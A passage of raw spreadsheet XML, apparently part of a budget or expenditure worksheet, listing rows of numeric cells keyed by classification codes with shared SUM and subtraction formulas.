        <v>0</v>
      </c>
      <c r="AM923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="924" ht="18" customHeight="1" spans="1:42">
      <c r="A924" s="10"/>
      <c r="B924" s="10"/>
      <c r="C924" s="28"/>
      <c r="D924" s="10">
        <v>2130334</v>
      </c>
      <c r="E924" s="16" t="s">
        <v>3702</v>
      </c>
      <c r="F924" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G924" s="17"/>
      <c r="H924" s="17"/>
      <c r="I924" s="17"/>
      <c r="J924" s="17"/>
      <c r="K924" s="17"/>
      <c r="L924" s="17"/>
      <c r="M924" s="17"/>
      <c r="N924" s="17"/>
      <c r="O924" s="17"/>
      <c r="P924" s="17"/>
      <c r="Q924" s="17"/>
      <c r="R924" s="17"/>
      <c r="S924" s="17"/>
      <c r="T924" s="17"/>
      <c r="U924" s="17"/>
      <c r="V924" s="17"/>
      <c r="W924" s="17"/>
      <c r="X924" s="17"/>
      <c r="Y924" s="17"/>
      <c r="Z924" s="17"/>
      <c r="AA924" s="17"/>
      <c r="AB924" s="17"/>
      <c r="AC924" s="17"/>
      <c r="AD924" s="17"/>
      <c r="AE924" s="17">
        <f t="shared" ref="AE924:AG928" si="452">G924-S924</f>
        <v>0</v>
      </c>
      <c r="AF924" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AG924" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AH924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AI924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AK924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AM924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP924" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="925" ht="18" customHeight="1" spans="1:42">
      <c r="A925" s="10"/>
      <c r="B925" s="10"/>
      <c r="C925" s="28"/>
      <c r="D925" s="10">
        <v>2130335</v>
      </c>
      <c r="E925" s="16" t="s">
        <v>3703</v>
      </c>
      <c r="F925" s="14">
        <f t="shared" si="449"/>
        <v>46</v>
      </c>
      <c r="G925" s="17"/>
      <c r="H925" s="17"/>
      <c r="I925" s="17"/>
      <c r="J925" s="17"/>
      <c r="K925" s="17"/>
      <c r="L925" s="17">
        <v>46</v>
      </c>
      <c r="M925" s="17"/>
      <c r="N925" s="17"/>
      <c r="O925" s="17"/>
      <c r="P925" s="17"/>
      <c r="Q925" s="17"/>
      <c r="R925" s="17"/>
      <c r="S925" s="17"/>
      <c r="T925" s="17"/>
      <c r="U925" s="17"/>
      <c r="V925" s="17"/>
      <c r="W925" s="17"/>
      <c r="X925" s="17">
        <v>441</v>
      </c>
      <c r="Y925" s="17"/>
      <c r="Z925" s="17"/>
      <c r="AA925" s="17"/>
      <c r="AB925" s="17"/>
      <c r="AC925" s="17"/>
      <c r="AD925" s="17"/>
      <c r="AE925" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AF925" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AG925" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AH925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AI925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ925" s="17">
        <f t="shared" si="451"/>
        <v>-395</v>
      </c>
      <c r="AK925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AM925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP925" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="926" ht="18" customHeight="1" spans="1:42">
      <c r="A926" s="10"/>
      <c r="B926" s="10"/>
      <c r="C926" s="28"/>
      <c r="D926" s="10">
        <v>2130336</v>
      </c>
      <c r="E926" s="16" t="s">
        <v>3704</v>
      </c>
      <c r="F926" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G926" s="17"/>
      <c r="H926" s="17"/>
      <c r="I926" s="17"/>
      <c r="J926" s="17"/>
      <c r="K926" s="17"/>
      <c r="L926" s="17"/>
      <c r="M926" s="17"/>
      <c r="N926" s="17"/>
      <c r="O926" s="17"/>
      <c r="P926" s="17"/>
      <c r="Q926" s="17"/>
      <c r="R926" s="17"/>
      <c r="S926" s="17"/>
      <c r="T926" s="17"/>
      <c r="U926" s="17"/>
      <c r="V926" s="17"/>
      <c r="W926" s="17"/>
      <c r="X926" s="17"/>
      <c r="Y926" s="17"/>
      <c r="Z926" s="17"/>
      <c r="AA926" s="17"/>
      <c r="AB926" s="17"/>
      <c r="AC926" s="17"/>
      <c r="AD926" s="17"/>
      <c r="AE926" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AF926" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AG926" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AH926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AI926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AK926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AM926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP926" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="927" ht="18" customHeight="1" spans="1:42">
      <c r="A927" s="10"/>
      <c r="B927" s="10"/>
      <c r="C927" s="28"/>
      <c r="D927" s="10">
        <v>2130337</v>
      </c>
      <c r="E927" s="16" t="s">
        <v>3705</v>
      </c>
      <c r="F927" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G927" s="17"/>
      <c r="H927" s="17"/>
      <c r="I927" s="17"/>
      <c r="J927" s="17"/>
      <c r="K927" s="17"/>
      <c r="L927" s="17"/>
      <c r="M927" s="17"/>
      <c r="N927" s="17"/>
      <c r="O927" s="17"/>
      <c r="P927" s="17"/>
      <c r="Q927" s="17"/>
      <c r="R927" s="17"/>
      <c r="S927" s="17"/>
      <c r="T927" s="17"/>
      <c r="U927" s="17"/>
      <c r="V927" s="17"/>
      <c r="W927" s="17"/>
      <c r="X927" s="17"/>
      <c r="Y927" s="17"/>
      <c r="Z927" s="17"/>
      <c r="AA927" s="17"/>
      <c r="AB927" s="17"/>
      <c r="AC927" s="17"/>
      <c r="AD927" s="17"/>
      <c r="AE927" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AF927" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AG927" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AH927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AI927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AK927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AM927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP927" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="928" ht="18" customHeight="1" spans="1:42">
      <c r="A928" s="10"/>
      <c r="B928" s="10"/>
      <c r="C928" s="28"/>
      <c r="D928" s="10">
        <v>2130399</v>
      </c>
      <c r="E928" s="16" t="s">
        <v>3706</v>
      </c>
      <c r="F928" s="14">
        <f t="shared" si="449"/>
        <v>37</v>
      </c>
      <c r="G928" s="17"/>
      <c r="H928" s="17">
        <v>11</v>
      </c>
      <c r="I928" s="17">
        <v>11</v>
      </c>
      <c r="J928" s="17"/>
      <c r="K928" s="17"/>
      <c r="L928" s="17"/>
      <c r="M928" s="17"/>
      <c r="N928" s="17"/>
      <c r="O928" s="17"/>
      <c r="P928" s="17"/>
      <c r="Q928" s="17"/>
      <c r="R928" s="17">
        <v>26</v>
      </c>
      <c r="S928" s="17">
        <v>8</v>
      </c>
      <c r="T928" s="17">
        <v>11</v>
      </c>
      <c r="U928" s="17">
        <v>11</v>
      </c>
      <c r="V928" s="17"/>
      <c r="W928" s="17"/>
      <c r="X928" s="17"/>
      <c r="Y928" s="17"/>
      <c r="Z928" s="17"/>
      <c r="AA928" s="17"/>
      <c r="AB928" s="17"/>
      <c r="AC928" s="17"/>
      <c r="AD928" s="17">
        <v>26</v>
      </c>
      <c r="AE928" s="17">
        <f t="shared" si="452"/>
        <v>-8</v>
      </c>
      <c r="AF928" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AG928" s="17">
        <f t="shared" si="452"/>
        <v>0</v>
      </c>
      <c r="AH928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AI928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AK928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AM928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AN928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AO928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AP928" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
    </row>
    <row r="929" ht="18" customHeight="1" spans="1:42">
      <c r="A929" s="10"/>
      <c r="B929" s="10"/>
      <c r="C929" s="28"/>
      <c r="D929" s="10">
        <v>21305</v>
      </c>
      <c r="E929" s="11" t="s">
        <v>3707</v>
      </c>
      <c r="F929" s="14">
        <f t="shared" si="449"/>
        <v>2650</v>
      </c>
      <c r="G929" s="12">
        <f t="shared" ref="G929:R929" si="453">SUM(G930:G939)</f>
        <v>12</v>
      </c>
      <c r="H929" s="12">
        <f t="shared" si="453"/>
        <v>99</v>
      </c>
      <c r="I929" s="12">
        <f t="shared" si="453"/>
        <v>118</v>
      </c>
      <c r="J929" s="12">
        <f t="shared" si="453"/>
        <v>639</v>
      </c>
      <c r="K929" s="12">
        <f t="shared" si="453"/>
        <v>355</v>
      </c>
      <c r="L929" s="12">
        <f t="shared" si="453"/>
        <v>143</v>
      </c>
      <c r="M929" s="12">
        <f t="shared" si="453"/>
        <v>206</v>
      </c>
      <c r="N929" s="12">
        <f t="shared" si="453"/>
        <v>287</v>
      </c>
      <c r="O929" s="12">
        <f t="shared" si="453"/>
        <v>68</v>
      </c>
      <c r="P929" s="12">
        <f t="shared" si="453"/>
        <v>182</v>
      </c>
      <c r="Q929" s="12">
        <f t="shared" si="453"/>
        <v>164</v>
      </c>
      <c r="R929" s="12">
        <f t="shared" si="453"/>
        <v>488</v>
      </c>
      <c r="S929" s="12">
        <v>12</v>
      </c>
      <c r="T929" s="12">
        <v>64</v>
      </c>
      <c r="U929" s="12">
        <v>107</v>
      </c>
      <c r="V929" s="12">
        <v>639</v>
      </c>
      <c r="W929" s="12">
        <v>355</v>
      </c>
      <c r="X929" s="12">
        <v>143</v>
      </c>
      <c r="Y929" s="12">
        <v>166</v>
      </c>
      <c r="Z929" s="12">
        <v>154</v>
      </c>
      <c r="AA929" s="12">
        <v>0</v>
      </c>
      <c r="AB929" s="12">
        <v>182</v>
      </c>
      <c r="AC929" s="12">
        <v>140</v>
      </c>
      <c r="AD929" s="12">
        <v>204</v>
      </c>
      <c r="AE929" s="12">
        <f t="shared" ref="AE929:AP929" si="454">SUM(AE930:AE939)</f>
        <v>0</v>
      </c>
      <c r="AF929" s="12">
        <f t="shared" si="454"/>
        <v>35</v>
      </c>
      <c r="AG929" s="12">
        <f t="shared" si="454"/>
        <v>11</v>
      </c>
      <c r="AH929" s="12">
        <f t="shared" si="454"/>
        <v>0</v>
      </c>
      <c r="AI929" s="12">
        <f t="shared" si="454"/>
        <v>0</v>
      </c>
      <c r="AJ929" s="12">
        <f t="shared" si="454"/>
        <v>0</v>
      </c>
      <c r="AK929" s="12">
        <f t="shared" si="454"/>
        <v>40</v>
      </c>
      <c r="AL929" s="12">
        <f t="shared" si="454"/>
        <v>133</v>
      </c>
      <c r="AM929" s="12">
        <f t="shared" si="454"/>
        <v>68</v>
      </c>
      <c r="AN929" s="12">
        <f t="shared" si="454"/>
        <v>0</v>
      </c>
      <c r="AO929" s="12">
        <f t="shared" si="454"/>
        <v>24</v>
      </c>
      <c r="AP929" s="12">
        <f t="shared" si="454"/>
        <v>284</v>
      </c>
    </row>
    <row r="930" ht="18" customHeight="1" spans="1:42">
      <c r="A930" s="10"/>
      <c r="B930" s="10"/>
      <c r="C930" s="28"/>
      <c r="D930" s="10">
        <v>2130501</v>
      </c>
      <c r="E930" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F930" s="14">
        <f t="shared" si="449"/>
        <v>237</v>
      </c>
      <c r="G930" s="17"/>
      <c r="H930" s="17">
        <v>35</v>
      </c>
      <c r="I930" s="17"/>
      <c r="J930" s="17"/>
      <c r="K930" s="17"/>
      <c r="L930" s="17"/>
      <c r="M930" s="17"/>
      <c r="N930" s="17"/>
      <c r="O930" s="17"/>
      <c r="P930" s="17"/>
      <c r="Q930" s="17">
        <v>164</v>
      </c>
      <c r="R930" s="17">
        <v>73</v>
      </c>
      <c r="S930" s="17"/>
      <c r="T930" s="17"/>
      <c r="U930" s="17"/>
      <c r="V930" s="17"/>
      <c r="W930" s="17"/>
      <c r="X930" s="17"/>
      <c r="Y930" s="17"/>
      <c r="Z930" s="17"/>
      <c r="AA930" s="17"/>
      <c r="AB930" s="17"/>
      <c r="AC930" s="17">
        <v>140</v>
      </c>
      <c r="AD930" s="17">
        <v>73</v>
      </c>
      <c r="AE930" s="17">
        <f t="shared" ref="AE930:AP939" si="455">G930-S930</f>
        <v>0</v>
      </c>
      <c r="AF930" s="17">
        <f t="shared" si="455"/>
        <v>35</v>
      </c>
      <c r="AG930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO930" s="17">
        <f t="shared" si="455"/>
        <v>24</v>
      </c>
      <c r="AP930" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="931" ht="18" customHeight="1" spans="1:42">
      <c r="A931" s="10"/>
      <c r="B931" s="10"/>
      <c r="C931" s="28"/>
      <c r="D931" s="10">
        <v>2130502</v>
      </c>
      <c r="E931" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F931" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G931" s="17"/>
      <c r="H931" s="17"/>
      <c r="I931" s="17"/>
      <c r="J931" s="17"/>
      <c r="K931" s="17"/>
      <c r="L931" s="17"/>
      <c r="M931" s="17"/>
      <c r="N931" s="17"/>
      <c r="O931" s="17"/>
      <c r="P931" s="17"/>
      <c r="Q931" s="17"/>
      <c r="R931" s="17"/>
      <c r="S931" s="17"/>
      <c r="T931" s="17"/>
      <c r="U931" s="17"/>
      <c r="V931" s="17"/>
      <c r="W931" s="17"/>
      <c r="X931" s="17"/>
      <c r="Y931" s="17"/>
      <c r="Z931" s="17"/>
      <c r="AA931" s="17"/>
      <c r="AB931" s="17"/>
      <c r="AC931" s="17"/>
      <c r="AD931" s="17"/>
      <c r="AE931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP931" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="932" ht="18" customHeight="1" spans="1:42">
      <c r="A932" s="10"/>
      <c r="B932" s="10"/>
      <c r="C932" s="28"/>
      <c r="D932" s="10">
        <v>2130503</v>
      </c>
      <c r="E932" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F932" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G932" s="17"/>
      <c r="H932" s="17"/>
      <c r="I932" s="17"/>
      <c r="J932" s="17"/>
      <c r="K932" s="17"/>
      <c r="L932" s="17"/>
      <c r="M932" s="17"/>
      <c r="N932" s="17"/>
      <c r="O932" s="17"/>
      <c r="P932" s="17"/>
      <c r="Q932" s="17"/>
      <c r="R932" s="17"/>
      <c r="S932" s="17"/>
      <c r="T932" s="17"/>
      <c r="U932" s="17"/>
      <c r="V932" s="17"/>
      <c r="W932" s="17"/>
      <c r="X932" s="17"/>
      <c r="Y932" s="17"/>
      <c r="Z932" s="17"/>
      <c r="AA932" s="17"/>
      <c r="AB932" s="17"/>
      <c r="AC932" s="17"/>
      <c r="AD932" s="17"/>
      <c r="AE932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP932" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="933" ht="18" customHeight="1" spans="1:42">
      <c r="A933" s="10"/>
      <c r="B933" s="10"/>
      <c r="C933" s="28"/>
      <c r="D933" s="10">
        <v>2130504</v>
      </c>
      <c r="E933" s="16" t="s">
        <v>3708</v>
      </c>
      <c r="F933" s="14">
        <f t="shared" si="449"/>
        <v>1018</v>
      </c>
      <c r="G933" s="17"/>
      <c r="H933" s="17"/>
      <c r="I933" s="17"/>
      <c r="J933" s="17">
        <v>639</v>
      </c>
      <c r="K933" s="17"/>
      <c r="L933" s="17">
        <v>105</v>
      </c>
      <c r="M933" s="17">
        <v>206</v>
      </c>
      <c r="N933" s="17"/>
      <c r="O933" s="17">
        <v>68</v>
      </c>
      <c r="P933" s="17"/>
      <c r="Q933" s="17"/>
      <c r="R933" s="17"/>
      <c r="S933" s="17"/>
      <c r="T933" s="17"/>
      <c r="U933" s="17"/>
      <c r="V933" s="17">
        <v>639</v>
      </c>
      <c r="W933" s="17"/>
      <c r="X933" s="17">
        <v>105</v>
      </c>
      <c r="Y933" s="17">
        <v>166</v>
      </c>
      <c r="Z933" s="17"/>
      <c r="AA933" s="17"/>
      <c r="AB933" s="17"/>
      <c r="AC933" s="17"/>
      <c r="AD933" s="17"/>
      <c r="AE933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK933" s="17">
        <f t="shared" si="455"/>
        <v>40</v>
      </c>
      <c r="AL933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM933" s="17">
        <f t="shared" si="455"/>
        <v>68</v>
      </c>
      <c r="AN933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP933" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="934" ht="18" customHeight="1" spans="1:42">
      <c r="A934" s="10"/>
      <c r="B934" s="10"/>
      <c r="C934" s="28"/>
      <c r="D934" s="10">
        <v>2130505</v>
      </c>
      <c r="E934" s="16" t="s">
        <v>3709</v>
      </c>
      <c r="F934" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G934" s="17"/>
      <c r="H934" s="17"/>
      <c r="I934" s="17"/>
      <c r="J934" s="17"/>
      <c r="K934" s="17"/>
      <c r="L934" s="17"/>
      <c r="M934" s="17"/>
      <c r="N934" s="17"/>
      <c r="O934" s="17"/>
      <c r="P934" s="17"/>
      <c r="Q934" s="17"/>
      <c r="R934" s="17"/>
      <c r="S934" s="17"/>
      <c r="T934" s="17"/>
      <c r="U934" s="17"/>
      <c r="V934" s="17"/>
      <c r="W934" s="17"/>
      <c r="X934" s="17"/>
      <c r="Y934" s="17"/>
      <c r="Z934" s="17"/>
      <c r="AA934" s="17"/>
      <c r="AB934" s="17"/>
      <c r="AC934" s="17"/>
      <c r="AD934" s="17"/>
      <c r="AE934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP934" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="935" ht="18" customHeight="1" spans="1:42">
      <c r="A935" s="10"/>
      <c r="B935" s="10"/>
      <c r="C935" s="28"/>
      <c r="D935" s="10">
        <v>2130506</v>
      </c>
      <c r="E935" s="16" t="s">
        <v>3710</v>
      </c>
      <c r="F935" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G935" s="17"/>
      <c r="H935" s="17"/>
      <c r="I935" s="17"/>
      <c r="J935" s="17"/>
      <c r="K935" s="17"/>
      <c r="L935" s="17"/>
      <c r="M935" s="17"/>
      <c r="N935" s="17"/>
      <c r="O935" s="17"/>
      <c r="P935" s="17"/>
      <c r="Q935" s="17"/>
      <c r="R935" s="17"/>
      <c r="S935" s="17"/>
      <c r="T935" s="17"/>
      <c r="U935" s="17"/>
      <c r="V935" s="17"/>
      <c r="W935" s="17"/>
      <c r="X935" s="17"/>
      <c r="Y935" s="17"/>
      <c r="Z935" s="17"/>
      <c r="AA935" s="17"/>
      <c r="AB935" s="17"/>
      <c r="AC935" s="17"/>
      <c r="AD935" s="17"/>
      <c r="AE935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP935" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="936" ht="18" customHeight="1" spans="1:42">
      <c r="A936" s="10"/>
      <c r="B936" s="10"/>
      <c r="C936" s="28"/>
      <c r="D936" s="10">
        <v>2130507</v>
      </c>
      <c r="E936" s="16" t="s">
        <v>3711</v>
      </c>
      <c r="F936" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G936" s="17"/>
      <c r="H936" s="17"/>
      <c r="I936" s="17"/>
      <c r="J936" s="17"/>
      <c r="K936" s="17"/>
      <c r="L936" s="17"/>
      <c r="M936" s="17"/>
      <c r="N936" s="17"/>
      <c r="O936" s="17"/>
      <c r="P936" s="17"/>
      <c r="Q936" s="17"/>
      <c r="R936" s="17"/>
      <c r="S936" s="17"/>
      <c r="T936" s="17"/>
      <c r="U936" s="17"/>
      <c r="V936" s="17"/>
      <c r="W936" s="17"/>
      <c r="X936" s="17"/>
      <c r="Y936" s="17"/>
      <c r="Z936" s="17"/>
      <c r="AA936" s="17"/>
      <c r="AB936" s="17"/>
      <c r="AC936" s="17"/>
      <c r="AD936" s="17"/>
      <c r="AE936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AF936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AG936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AH936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AI936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AJ936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AK936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AL936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AM936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AN936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AO936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
      <c r="AP936" s="17">
        <f t="shared" si="455"/>
        <v>0</v>
      </c>
    </row>
    <row r="937" ht="18" customHeight="1" spans="1:42">
      <c r="A937" s="10"/>
      <c r="B937" s="10"/>
      <c r="C937" s="28"/>
      <c r="D937" s="10">
        <v>2130508</v>
      </c>
      <c r="E937" s="16" t="s">
        <v>3712</v>
      </c>
      <c r="F937" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
